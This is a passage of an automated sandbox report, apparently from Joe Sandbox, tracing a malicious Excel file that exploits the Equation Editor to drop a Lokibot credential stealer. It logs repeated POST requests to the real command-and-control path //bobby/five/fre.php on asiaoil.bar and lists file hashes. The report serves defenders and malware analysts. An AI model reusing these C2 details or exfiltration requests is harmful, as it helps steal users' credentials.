                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=glNfx46H3%2BbVLTKDrhap51MhlIRkcModymLBNBd7dZ%2Bl67BTPpZNpBIlfD8OgL00wxL3CdtX6qUD2pekmgxeoZGkVArQG2lmbN%2B57FmuOEvY0CiRqZc24nnj2bPcgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446eac805911f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    61192.168.2.2249226172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:09.667687893 CET419OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:09.773921967 CET420INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YpuHPmOjZQu3BJ71RrU5rE6ZD4gK%2FiddjmVX1894nkleKqaO0ZuA%2FZ4t0Hhr%2FEBANQiy%2F1dOteI5pqxTSy6LKaSwgoWmbo0Tuise9gruTiTrmWfL3ef0CFnSmrOP6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446f1795e8fd4-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    62192.168.2.2249227172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:10.711121082 CET421OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:10.805613041 CET422INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=263d7oWUNYmuRg8qalPaQG1rkbIXer23yE4CCwJl%2BycPuClpFI6FPf1gIeOZyF3Nt4DWuR0XxZA%2FK2Gwfg9%2FRUCXAmdrBxYU%2F%2FgwYdWQXfhfADT4oSnWfcr7aGjXFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446f7fa7290a3-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    63192.168.2.2249228172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:11.750458956 CET423OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:11.894766092 CET424INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rZcJVrDpVn0Jvm1Vx3izcMxx2xxi%2BRY0gOKUM%2BjgWD%2BYJ2bGoZJPCLIhbsX3VLB%2FEbDTmlKbO8MOV5p8OY13hTQVrNs14q81gtqG%2BYeK%2B7ujkKePtZGTix4rgIZT4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446fe7f4690fe-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    64192.168.2.2249229172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:12.826739073 CET424OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:12.954328060 CET425INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiz8VTs2nqW2CMp0oz2HdrtKIKW9o%2B7ImEcKl2VS1ifwy0ulNriRcW%2FuIGG1IoL3PiyPTyaWq%2BPUB82nqy1x%2F7uZPeiH7cbbBHoH7NU9xoGBLymRw5hquZwyAOhtcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44705396d911e-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    65192.168.2.2249230172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:13.916424990 CET426OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:14.009248972 CET427INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=meN57bW15OrovAiOaftPdPV%2BVu9aNc%2FmGkhf3DxgM8J7CqQPL97QEdbuifiRTAjK93npEn2xIesb%2FN5MC7%2B7xpKWknwpItKd6NXh4KBXOeDXxIfIsEdpLWRlGlrQsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4470c0b639142-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    66192.168.2.2249231104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:14.928308964 CET428OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:15.005187035 CET429INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLXoax8jkqv8eBPwf%2B%2FHkLStnp33pID1OGlxzxpw8mT%2BDJtVm%2Fko7dCOHPmAgnMB01wvsNPWgM%2BACIJ3McTTt4l4slPJE0ia9l6oA1b3jZBpZmUytzUvT6%2BsM8O8%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db447125bf8911f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    67192.168.2.2249232172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:16.169338942 CET430OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:16.265043974 CET431INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gZJQzAkWL%2Fu0oyFSXQkAE19rOUvT86ounx%2F2nUfTZE5zhEaRM6VwUQCQNWwfitnmL12%2B1q8KR5pPRKomKLsKvLs0yZmFdrB49ckYXWQAh8%2FP4%2FjzcT6%2BgWMfOI%2Bcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4471a19969048-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    68192.168.2.2249234104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:17.425743103 CET432OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:17.529016018 CET433INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CVWgNT%2F3L1%2BppaTVgVDCxoKwuyVyVDAH6zVKoRJylnyRNyfDC2xX0Vm24lOeOSechfzcA1vgmVZNQs67XBF8JYV4Q8GGFRHDfBe2OCBaYxj7dDGPN3FxV3Y9%2Fs9AEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44721ffb76983-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    69192.168.2.2249235104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:18.783854008 CET433OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:18.911052942 CET434INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JkW3Yfq8929bkmz%2BZxma5WCDFCwlkkeMrZVjES5%2BGp19oTJDA%2FvVeGYB6q0J4yXwf6O8Ujd%2Bm4xURLIdmdWv80xluGmLKk%2BK5CnuxjOzH0TaS2jR2NsT%2BwpcvVu%2BPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4472a7d7c9193-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.2249172104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:08.131839037 CET323OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:08.291701078 CET324INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GAzVwCo6pQjEmafddnL4QX9z1sDFHB2J%2FYbOLf50is46eNnXoOwYOokrFvyBn6ciX3XJ3aLhnc3SW1RSny%2BWp7rsb%2FchkjZeaoltFUzmAOwl3IbNQWt4WAouWFDm8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44570da0591ea-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    70192.168.2.2249236172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:19.840840101 CET435OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:19.945090055 CET436INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jX4p5OL3M4bhKeaGYr6eMZP4ecEb%2BRQKJFJMvHycGUM%2BR1sW8i66slzCERtcv76o3GVZu2AT%2BBb9%2BnWVHSGrEHQ65OlnuuLV3NX69%2BnX0CllH9Ufi1dPL3kXbE9UsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db447310d2a918f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    71192.168.2.2249237172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:20.970686913 CET437OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:21.069719076 CET438INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wCsqQDtUNyAdb8N7QE5gpRV6yQp9OM5kLzcDr7AlwMrEbZXvVwvalAee7gk3yYD6lCHsuYIHi9jPPTnfADT3Vv66t86Ej5Rk3p%2BU8OrA6dwgCuh8u7DexDMJSkMrXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db447381a755be1-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    72192.168.2.2249238172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    73192.168.2.2249239172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    74192.168.2.2249240172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    75192.168.2.2249241104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    76192.168.2.2249242104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    77192.168.2.2249243172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    78192.168.2.2249244172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    79192.168.2.2249245172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.2249173172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:09.274962902 CET325OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:09.407815933 CET326INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Es%2BCG1ikpvgB48TpSGLWbDWE4lq9KcFNWoR2DepgSQQlwCDx1lJRGNxwRi%2Fuixs5%2FkJ%2BkDAOwOExmpgG%2BFmlHRat148sW8J8clBcEhbV%2BEh21BpaPsALJP5WpoKTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4457809ea6939-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    80192.168.2.2249246172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    81192.168.2.2249247172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.2249174104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:10.415911913 CET326OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:10.503607035 CET327INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v1xV1eUCMr1RHqWt4LM%2Fv%2BEUgUSXOzGnZmG6dttvsqUD60K11ymXFrl4lyksF6Q7oS%2BhJuNDPXKkgp1NVPUepBFUa%2B45veh4yiZTSSeqWs9tYXq72%2F%2FEXVVMkf5Q8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4457f29af917d-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:10:21:15
                    Start date:10/02/2022
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f770000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:2
                    Start time:10:21:38
                    Start date:10/02/2022
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:4
                    Start time:10:21:40
                    Start date:10/02/2022
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\Public\vbc.exe"
                    Imagebase:0x400000
                    File size:295124 bytes
                    MD5 hash:7DF1896047D9647D818080DD17563D92
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    General

                    Target ID:5
                    Start time:10:21:41
                    Start date:10/02/2022
                    Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                    Imagebase:0x8a0000
                    File size:125440 bytes
                    MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Target ID:6
                    Start time:10:21:41
                    Start date:10/02/2022
                    Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                    Imagebase:0x8a0000
                    File size:125440 bytes
                    MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
